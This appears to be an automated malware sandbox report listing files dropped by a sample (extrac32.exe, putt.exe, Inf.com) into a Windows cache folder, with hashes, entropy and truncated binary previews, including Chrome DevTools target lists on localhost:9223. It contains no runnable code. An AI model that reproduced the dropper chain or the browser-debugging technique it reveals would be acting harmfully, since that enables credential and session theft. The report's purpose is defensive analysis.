                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):727
                                                                                                                                                                                                                                                                          Entropy (8bit):4.101388958324534
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:SyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:SyGS9PvCA433C+sCNC1
                                                                                                                                                                                                                                                                          MD5:B7AB55F71BFCD99EE591FC2293C497AA
                                                                                                                                                                                                                                                                          SHA1:2EC19D190A7933A11E70F4C14AA5EE11704C2BDB
                                                                                                                                                                                                                                                                          SHA-256:FAB67D9952658803C23ED37CB31EF8B70AE9D418641BBD9D6E48DB959D8AE51D
                                                                                                                                                                                                                                                                          SHA-512:FDEAEC906C8D6D468B370300BA745283158E70F38874163CB732C88AB972BAA08A9F233E346C701B81C8076E3452F97AA56739616D02313FD10F0C9F9C2BD60C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:aid........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Glad

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997961977558292
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:GiBm4AFxoREyNUV7afvNWl2CSB4w51YrYILPOZfvIix/NvQLc:GidKgNE7af1kXvoyhLWRNvx
                                                                                                                                                                                                                                                                          MD5:B9D283F35F6051D1583EC106DA9F1A14
                                                                                                                                                                                                                                                                          SHA1:D3C27BE9B09E9CEFD7AC6AE4E56F1B75B7389D63
                                                                                                                                                                                                                                                                          SHA-256:6AC9078BEFA65EB3BF7487C74FE921C5B424EF9E12902B59DCB9D192ED39D342
                                                                                                                                                                                                                                                                          SHA-512:0B5B9BBA450A9C9506569E8617964B8AFE14195932F145BB95F2BF2AD24565A18CE3F0C5E40A4D3E05768906CA96B11106AFEB7D43A81DD42FBEC83DA1D9FBAB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:b...W....Vg.....c..@...\B...7....$..Z.=....a5d.;.....`.k..4K...i..............-...A"....vHD....p+.won5c..t.i*W....'X.F..R..s.=........Dv;.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.F.'.F...h..............X..<2...X..<2..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t.P..,P..Myn.2..t.W....$....D...F...X...g...X..<2..m.........8.5...x..2).U.j....r>.v".].w...)...hG..}.k..-...N.2...)<.G..G...c.'.t.&f/]._2..GR.._...?X.1}.O N......`2r...V.3.Y3.mr....3...Ns...?.j...k...]..?..Y.tP#.K..L............s..*l.Qq:.....Z.V.:.4.....Wer=...k.{%..&..#k,F...(.5..h..?7..... ..,H.m. ......4..~r>-..6.O......<cWk.3"....-k.c../.i../s.UYGzs!..Z.Z...........F..Dr.J...=[..0......[...= ...S...&\..o.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\json[1].json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3500
                                                                                                                                                                                                                                                                          Entropy (8bit):5.397224911645588
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:6NnC6FHCKNnC0bC2NnCO8u9C0NnCZdgECkNnChTiCLNnC4DCKNnCYwCINnCeco37:6N9NPN9N6HNwTLNv/Np+NpcSd
                                                                                                                                                                                                                                                                          MD5:514BFA307A5834A04AA889E3C0CB2A05
                                                                                                                                                                                                                                                                          SHA1:6D942CE162206BE4955DEBC525D48060824C2F9B
                                                                                                                                                                                                                                                                          SHA-256:17071C7E46FEAEC0C005B91E3624AE0359B77A6E4D2F4845757D9B7BD416D49F
                                                                                                                                                                                                                                                                          SHA-512:EAECE4A0775F2DC387F4302F5747867B10F62C5843CC5FB23A6802DB09088BE0AEDA132BA495115DD617FE39B75EBB9BD05A3FE98C7CD86B1F7576EB63F9F551
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/99EB54F49666910FCAAB36A930FFACBA",.. "id": "99EB54F49666910FCAAB36A930FFACBA",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/99EB54F49666910FCAAB36A930FFACBA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5E7FF74984316FD28E576A35FC9534F4",.. "id": "5E7FF74984316FD28E576A35FC9534F4",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5E7FF74984316FD28E576A35FC9534F4"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\json[1].json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                          Entropy (8bit):5.377473532179226
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCq/IVTECq/rfNaoCwCfwfNaoCqqCqZfNaoCw30UrU0U8Cg:6NnCqQTECq7NnCwCENnCqqCq1NnCw306
                                                                                                                                                                                                                                                                          MD5:A07AB3A574238A8A2330F38BBBCAE803
                                                                                                                                                                                                                                                                          SHA1:7FBFC0E63E7B24CBDC4B71EC872CEA8FDC6DAA25
                                                                                                                                                                                                                                                                          SHA-256:191D02698E9BEF7D51F0085BB71ED8744AA1EDA5DDF087A804C1542E8220C6A6
                                                                                                                                                                                                                                                                          SHA-512:44663CA8F9308CA9D28BC3C0A95E7C7E53FD11D6410D35FC86EB954AC087F3B2D2E36FF3FFD531C19E7038BCEDAE63901DBD215A2666338BDA7AE711F686C3C6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0FA26EDD1E48AE9269015DBB8244A08B",.. "id": "0FA26EDD1E48AE9269015DBB8244A08B",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0FA26EDD1E48AE9269015DBB8244A08B"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A2928ADAD1108BD5FEF1E80C5639BB65",.. "id": "A2928ADAD1108BD5FEF1E80C5639BB65",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A2928ADAD1108BD5FEF1E80C5639BB65"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Name

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):122880
                                                                                                                                                                                                                                                                          Entropy (8bit):5.443588249528694
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:h4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AU:hBNIimuzaAwusPdKaj6iTcPAsAhxY
                                                                                                                                                                                                                                                                          MD5:B7A225A35892C158541ED50000DE3CA1
                                                                                                                                                                                                                                                                          SHA1:2ED01C2E0C53C3F61F1D8CA3AEA5CFB122F543FD
                                                                                                                                                                                                                                                                          SHA-256:5197B20A0EA030CAFD792C75D14663EBC790D55D4CA748ECC5DA58E797BDCB1E
                                                                                                                                                                                                                                                                          SHA-512:2731875211B4AE294A95DE3128451B111D801326C8BFD19E64582D25BD39724EBF672BE9A35E2CC52020B145A7964B116ED6445FFA6226C2487C1919560A09FE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...<..a..?_".C...<.lX^...?...@...<..{./.?$.8..^.<.]h.Np.?b..X*..<......?..}._.<...s...?...p.t.<..h.f2.?..$..V.<..4{#s.?U...g..<......?...w...<.J.....?I..Z...<.*.Ow5.?...@..<...FHv.?N.....<..!....?..j....<..v(...?..z..".<.i.6.8.?..?!...<.<...y.?G..o...<.....?.xeF...<.....?.G..T..<...1.<.?V.....<...{.}.?...0...<.......?...a@..<.....?..0....<....@.?....1..<..3...?...a.U.<.!.E...?.I.....<.......?.......<..j.)E.?O......<.I..W..?W.0.e).<...u...?.....T.<......?....?..<..X.J.?!.PO79.<../.Q..?.;..X..<.J]...?V:e:...<..Q....?.Wm..`.<.b;.SO.?4Td.'..<..Xw...?.Y....<...L"..?d...S.<._}?...?.T...x.<..[b.U.?.\.z#..<.^....?1......<..N....?.wa....<.......?....N9.<.a.X;[.?...Y'].<.@...?.....E.<.VOu...?!S..X.<..b.- .?C.:....<...|.a.?B.<..$.<..{...?+X.UG.<.m..e..?>U....<..o]2'.?....I..<....i.?G......<...o..? ...n.<.9.[...?...|.^.<.......?.>o.j..<..._.p.?1S...<..X....?.....l.<..~...?o.x....<.%3.d..?.....{.=.4 ..L.?...V!..=.b..#..?....@g.=....a..?G....z.=..]...?....6..=.o.J

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Norway

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):75776
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997833338326358
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:bwDHPOTarQNZo49+qq5EkZa2m75a6K2SILq7E2Uyg3a:U7zMX9+75ETXnpSzoyg3a
                                                                                                                                                                                                                                                                          MD5:861ABB01893CEF00C917F520F2AC50C9
                                                                                                                                                                                                                                                                          SHA1:784492CD688537ECE38D75D5F9345CD75736F13E
                                                                                                                                                                                                                                                                          SHA-256:1D40C9FE3FF124342CD6638D8D536267D15DABF9B6816BE3507923912AF8658A
                                                                                                                                                                                                                                                                          SHA-512:6B112DF90D22D4C23517F1E7446172025C151F3617F730041EA49C8943572D2D93E7FBA35E4594B5139C73E1321F8B77710888D0001B203502E6CF264877008C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.M(yE.D.#..8....Z(..}<kejc...a.?n|... Q...........0.BR.W...[i....z..m....].B...b..yM.Ik.#@...|i.o.."z(K.O_.8x....%.....Ll..LU.}.}s.wH..+..............Uw.Qm.KPgD^O+c...i.s...M...,z....3 .|+.~[dZ..m..96.:%.%.....O.. h......n.1....F.....s.Gv.*s......c3<...........^.G.1.P...a.^.t.o......&..ZV..".......qq.{......#."&.tu.+0*.....?..k{gO......k...z.......J...$cw..Fl..,x.h.h.N..x..B.........n-\.]?0....U......1.....O.....k..Kl_}...?j-0....DC....H...R8,.oV...x^.?g..}1........._..~.'..6-...)..).Nr...(.#6Q...aA}..C5)..cI..........g:.d..h..YL^.t=B..{..w>I.{.FT.J....$?.Z...5.<...ou2...?..o.[...\A......u9v.LB7;..2.......b.._...(7.R.~.....Yl...|..K...l..E+....7.*.>c...G.|;\.D..V.~.*J..zg..&..h(...*..V(.g.Y{.7.g..2y........K.(.i.mzMNa........-....u..7.'..%.o=+.....yj..\...Q...Fm.d...Tx.z4........?^..*.L...%0.Wq.....p..F.)m...Lw..x.NP...T..=..&bL..8............>.q...^+7(.%...]W...l.C_..J.....UG*..%M.]..K.........9...X.b.si.D.#.}m-.....f_..S"..._.q..A..i....@..".WS

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Proceedings

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):128000
                                                                                                                                                                                                                                                                          Entropy (8bit):6.342106044541643
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:oZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf9:oK5vPeDkjGgQaE/loUDtf9
                                                                                                                                                                                                                                                                          MD5:AE62072FC20EC1B324E6B41DD123A00E
                                                                                                                                                                                                                                                                          SHA1:9519EED850217F390C043A7E8505CA88E43DBD8F
                                                                                                                                                                                                                                                                          SHA-256:FDA63E313CE6AE96F8A08D803D4822E8757D82DEAE07650303B2D5A54D45CEFE
                                                                                                                                                                                                                                                                          SHA-512:E3471F6D3EDDEB13B989EE72EA2A4A8A33D7B0DA1B1F99DEE25C8132B08FD4BE70063A0335E1D300E9FE252C87DA9CE816900C8468C559D0CBF1E1F466D643D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3..................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Recovery

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):88064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.671440792234813
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:mGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+6:K5mjccBiqXvpgF4qv+32eOyKODOSpQ6
                                                                                                                                                                                                                                                                          MD5:4ED5DCEF027C1FAAD9B155A863F099E7
                                                                                                                                                                                                                                                                          SHA1:F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6
                                                                                                                                                                                                                                                                          SHA-256:B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
                                                                                                                                                                                                                                                                          SHA-512:100BE28B2E696A1BA6543EE005606C782AE2E35BB0E63C56E43CB5FE03B874078A1554C7EBE40121DB5ABFED2FC90E9DDDA3F5B390BF429247268BE902047D2E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.....M..E.E..u.E...._....M....^..j......j.h..L......e...MZ..f9...@.u].<.@.....@.PE..uL.....f9...@.u>.E....@.+.PQ.^...YY..t'.x$.|!.E..........E..3.8..........e..E.....2..M.d......Y_^[..U.........t..}..u.3....M...].U..=..M..t..}..u..u..."...u..[,..YY..].U....L...3...M.....u.....u...!....h..M..l!..Y..Y....#E.].U...u.......Y....H].U...u..Q...Y].."...j......Y..t.hL.B......Y3..j..S....U..j.h3'D.d.....PSVW...L.3.P.E.d.....h....h..M...8.I.h..J.....I.....u.h,.J.....I...........hH.J.V....I.hd.J.V......I.h..J.V......I.....t8..t4..t0.%(.M....h$.M.....I...W....V.,.M..y...YY.0.M...3.PPj.P....I..(.M...t..M.d......Y_^[..j..d....h..M...<.I..(.M...t.P..`.I..U..V...M.V..h.I.....L..E.A....L.V..d.,.....@.M.......L.........\.I.^].R...U..VW...M.W..h.I..u..>.u.....)jd.o...Y..>.t.d.,.....@.M.......L.......W..\.I._^].(.M...u%V.5..L...350.M......h$.M.......I...^.P....I..5(.M...H.I..U..=(.M..Vu,.5..L....u.35,.M....h..M...h$.M.......I....$...M.V..\.I.j..u..5(.M...L.I.V..h.I.^].Vj... .......P......3"

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Silicon

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):53248
                                                                                                                                                                                                                                                                          Entropy (8bit):4.0293746515034385
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:aMOULtVJBCQs1xaJ3WMygaruSIKlcQljLWWel319stEjFtr+/hdvE6HDyOpbM13i:JLtVSQsbZgar3R/OWel3EYr8qcDP8W1
                                                                                                                                                                                                                                                                          MD5:652AB88B812362A12F43E5F561E9ADB4
                                                                                                                                                                                                                                                                          SHA1:7C1DD2A4C15F9CC17C4DFFD1BA62D58A58A98FDD
                                                                                                                                                                                                                                                                          SHA-256:FF8C2A1CBAA6FDAC41F8D430E5AA9209B7F3514BFEB81F8D612E6AFD7ACD93F5
                                                                                                                                                                                                                                                                          SHA-512:DF3B0DFE676802FA9C8DDF5FDBE82B704541554D59F594C6333912CD17C4CE48945F5A07310D30429516CD594E44D7E3E20204E48FCA1D2D6D4B06E434B7814D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:rQueryValueW..VERSION.dll...timeGetTime.2.mciSendStringW....waveOutSetVolume..WINMM.dll.{.InitCommonControlsEx..S.ImageList_Create..o.ImageList_ReplaceIcon.T.ImageList_Destroy.m.ImageList_Remove..r.ImageList_SetDragCursorImage..P.ImageList_BeginDrag.V.ImageList_DragEnter.W.ImageList_DragLeave.^.ImageList_EndDrag.X.ImageList_DragMove..COMCTL32.dll....WNetAddConnection2W.I.WNetUseConnectionW....WNetCancelConnection2W..$.WNetGetConnectionW..MPR.dll.k.InternetCloseHandle...InternetOpenW...InternetSetOptionW..t.InternetCrackUrlW.Z.HttpQueryInfoW....InternetQueryOptionW..r.InternetConnectW..X.HttpOpenRequestW..^.HttpSendRequestW..5.FtpOpenFileW..2.FtpGetFileSize....InternetOpenUrlW....InternetReadFile....InternetQueryDataAvailable..WININET.dll...GetProcessMemoryInfo..PSAPI.DLL...IcmpCreateFile....IcmpSendEcho....IcmpCloseHandle.IPHLPAPI.DLL..!.LoadUserProfileW....CreateEnvironmentBlock..,.UnloadUserProfile...DestroyEnvironmentBlock.USERENV.dll.?.IsThemeActive.UxTheme.dll...InterlockedIncreme

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Subtle

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):70020
                                                                                                                                                                                                                                                                          Entropy (8bit):7.039348092119214
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:su0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:s4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                          MD5:4247BC278D872C15C7E77F75E2EC414D
                                                                                                                                                                                                                                                                          SHA1:3B3687C0CD3E511C262CB9E85034FE3BBB89E5A2
                                                                                                                                                                                                                                                                          SHA-256:973B0AE1E810E5E17A3A96B3B440F6D3CC588E0FB68819D8F249F7C0E81CBCBE
                                                                                                                                                                                                                                                                          SHA-512:349F6CBDC8F3B0FF07D3D1930B6FB96D6F2D88E073DD70491F5380CECEC05080A81E3B77F8004692F04D50A975666E31086BEA8E226FB46A6368E3B16D516DC2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:....p/.....;u3......pm2...i.;..|.]<q.....".T,.G...G.I.[=.x...s........#.l6...!'...+.YN^.q....3.vdb..;9.3..P.)....h..<:@"..;.\......;Z..T.f....#..0FE.@..;(..x....y...v..t.g...#.}...f..Gwu...^.!..B.y.op..,.....".A.0F....4...!.?..6...T.+...+..GC<6..Ho...t.:B.....px8M.oz/...Y.>..Z......,..$.@ .#"O.q'.|y.....d...s...&O....p'-.w#....<..H_.#H3!.Z....'...".t(../.XZZ.`O.Swz..{.7..w..:..S.{.b....d.....@&....\..s..;5[...X...f.........N\..F.SWgY,x....tG.'..b.F.\.....<>.C*..2.o..V..~u..j.~.y.f...D.KD..mN\..|u.....L.qb_7.p.E..>.=.... ......yn8.........E..l.GU....W[.mN].qCY.i.m......{..G.7.X[......yG....V...Y'......\..~<.....G..c....\.V. .7.#..........d..F{......6\._.s-....:..L."....u..T.3..n.w{.@:...3$#...S...x/.mX.(...9.fX."r\D..D..\..>..s.*/Od9yi.[..x..g.....]..#.3y.h...;....p.......<.|.f.#....?...>*..7..w5$...t.oG.i2C...<>.C&...z...g.;......lz.G.~...u.|~..e7g.74...<....&l.5.a.;.C#..Z.R..l...ef..x.wI...l.>.C........=..;.#....H'Z...BA.G....hw.\..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sunglasses

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):88064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.716538385178715
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:CUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoT:CxlHS3NxrHSBRtNPnj0nEoXnmK
                                                                                                                                                                                                                                                                          MD5:0B4EA7C4E70CFAC855BF4D7C0288E2BE
                                                                                                                                                                                                                                                                          SHA1:36430F5AD2C7964DFBD3B78921FE71FD89AAF575
                                                                                                                                                                                                                                                                          SHA-256:047C2EF53D55A7E575D02A23FDE3E8DA6C6D51A2504231BD4AD33B3E0824A3EE
                                                                                                                                                                                                                                                                          SHA-512:C04298BE87BF00CB3CADA0F302E80C8C8B5A0E9F1C0017B7B80B70040392136F209CC391B728F1905F36CB8406019C5370E7FC3043158523EFF0D9DC4CA5C071
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..LE..ME..ME..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..OE...@...@.FOE...@.jOE..OE..OE..OE..OE..OE..K....M.;.......P..k.............c....$..cE.......R...P.T$hj..3.|.3....=....N..i..j..e.3....'..........j..P...p..O......j..3.>..........Q.....................j........3...........i..j.V..........N....M.;......P.:j.......r.....;...&...W..j.......Q.....F..F.....................$..dE...........P.T$hj..6.>.............t}.K..h..j..h....tk.......j..W...p..P......j..6.........`.........V...Q.....K.........A.....j....6.......t.....h..j.S.......\$$......L$,.........*...T$(.D....L$,....P....,...E../...h..M..L$0.D$...........u..E....@.....L$,.8.X............F......>.^.......K....M.;......P.h..........L$,.0.g.............!....@......h..M..L$0.D$......o....}..u....V..D..f.x.G..........\$(......$.....A...$.....A...$.....A....$........$....P

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tired

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):97040
                                                                                                                                                                                                                                                                          Entropy (8bit):7.998385944090606
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:HgHymtPnJHvGNKNEahCqR+aCC9/uJX0Ze6Us+NeaeUxwSJqy2CRrRW/VVnS3YPDv:cycPhvGNWhTK4mXxNwHJ8qCeFAc86pSQ
                                                                                                                                                                                                                                                                          MD5:530245F3720C5A7DDD0567A546420A30
                                                                                                                                                                                                                                                                          SHA1:D5B8167F667D02398531C1CCE326509CB01E86E6
                                                                                                                                                                                                                                                                          SHA-256:B8D55ACFB72DB731DD7D1FC4FFD68B1E047E3C4CB07109BEC40B72EC4B6903DB
                                                                                                                                                                                                                                                                          SHA-512:B06FA89ABCD6913E253D7F86DC312089F7077C9F2E638DFFD27AE3849C897AE46DC3D3BA659AAF88D8A369C395D27BEA03B67B98442E9C4C925F502552606BB9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Q ..#....&o...W.:.6...U..#E.2.....z+a.(..-.W...7.,.|.C<L.9lq/Pr......Hr...-.7z.6!..3......e.....qo..h0..zg./....:...&ld.R|..z ..&L#...M....zRv..E'{..X.}."...7.d.....q:.{.,.)..b.}-.k.......+...ms.<..89)N[.?.x.v.%`dx(.C......W..i ^vux..A~n..b.<....9....>..S..^.S.z...ZP...}....#..m.o,.#~uO...b.s.FN..o;.?9p...n..Z.N...........k..Xy....m.:....@._..K.z....G....#3.*.)&q..$...SbF3.$..P5+3....:.....Pi)K.U..............N._F..g..s.1#....,;}.#......Y......Xp..s...3..............[.....x..1z1.c..A.8T....S....g...@|9..D.F......F.s...G.J.....hC.`...!.+R.IMT..0.e|..FX.....$.T.|.S.5._.*XR..........{..ez.F.[...........Rj.;..a..p$1x....[r.u..<.......6?..G0.?..a...S.((?..eq...j5.U....8..8....Dg..!.t@..B8*.].iW...CW...w.F....y.9w.. .....i....O......q-..~I........^v.|.d..].%].....!.%.S..b+W.% ..Zp.......%.c|GC...G..r........ln..;L.NP.a.:.8^....+...%.<..._*...Gl........)..y......W.8. ..J..L...*..RW"b# d3../.X9.....J..=..T..c5H.P..0...u..b\w.:..L.Q..3(.b_|...D...

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tulsa

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                                          Entropy (8bit):6.583824448269045
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:i+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coF:imVnjphfhnvO5bLezWWt/Dd314V14Zgt
                                                                                                                                                                                                                                                                          MD5:B655E394756A3AFA8CEC8800C5D1FB8B
